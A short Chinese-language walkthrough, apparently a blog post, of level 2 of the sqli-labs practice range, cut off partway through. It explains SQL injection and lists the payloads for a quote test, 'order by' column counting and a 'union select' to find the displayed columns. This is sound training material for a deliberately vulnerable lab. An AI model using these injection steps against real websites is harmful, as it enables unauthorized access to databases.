sqli-labs-master靶场第二关详解_sqli第二关

Sql注入攻击是通过将恶意的Sql查询或添加语句插入到应用的输入参数中，再在后台Sql服务器上解析执行进行的攻击。

Sql注入的产生原因是程序开发过程中不注意书写规范，对sql语句和关键字未进行过滤，导致客户端可以通过全局变量get或者post提交sql语句到服务器端正常运行。

1、点击进入sqli-labs-master靶场第二关Less-2

2、输入?id=1' and '1'='1，回显不正常，说明此处为数字型注入

3、依次输入?id=1 order by (1,2,3,4)--+，在输入4时出现报错，说明字段数为3

 4、输入?id=-1 union select 1,2,3--+判断回显位（其中的-1是不存在的值，用以使后方代码union select 1,2,3执行）

 5、输入?id=-1 u